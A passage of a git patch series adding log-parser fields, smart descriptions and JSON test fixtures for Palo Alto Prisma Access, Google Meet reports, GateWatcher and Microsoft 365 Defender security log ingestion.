- PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:33:29 +0100 Subject: [PATCH 65/84] Google Report: add source.ip and user.email --- Google Cloud/google-report/ingest/parser.yml | 2 + .../google-report/tests/test_end_call.json | 59 +++++++++++++++++++ .../tests/test_end_call_no_ip.json | 44 ++++++++++++++ .../tests/test_meet_sample1.json | 9 ++- 4 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 Google Cloud/google-report/tests/test_end_call.json create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 4213a66c9..a52024ed9 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -161,6 +161,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json @@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json @@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:39:44 +0100 Subject: [PATCH 66/84] Prettier on another parser to pass tests --- GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..20c57feb0 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -206,12 +206,12 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:41:05 +0100 Subject: [PATCH 67/84] fix on linting --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:07:17 +0100 Subject: [PATCH 68/84] Microsoft 365 defender : fix on smart descriptions --- .../_meta/smart-descriptions.json | 61 ++++++++++++ .../tests/test_cloud_app4.json | 63 ++++++++++++ .../tests/test_device_logon_failed.json | 98 +++++++++++++++++++ .../tests/test_email_delivered.json | 76 ++++++++++++++ .../tests/test_email_delivered2.json | 76 ++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..6232e66f8 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -1,4 +1,14 @@ [ + { + "value": "A new {action.type} cloud app event have been received", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ @@ -132,6 +142,35 @@ } ] }, + { + "value": "{user.domain}\\{user.name} failed to log on {host.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "device_logon_events" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "user.domain" + }, + { + "field": "action.type", + "value": "LogonFailed" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ @@ -402,6 +441,28 @@ { "field": "email.to.address" } ] }, + { + "value": "{event.action} email from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{event.action} email from {email.from.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" } + ] + }, + { + "value": "{event.action} email to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.to.address" } + ] + }, { "value": "{action.type} on {url.original}", "conditions": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 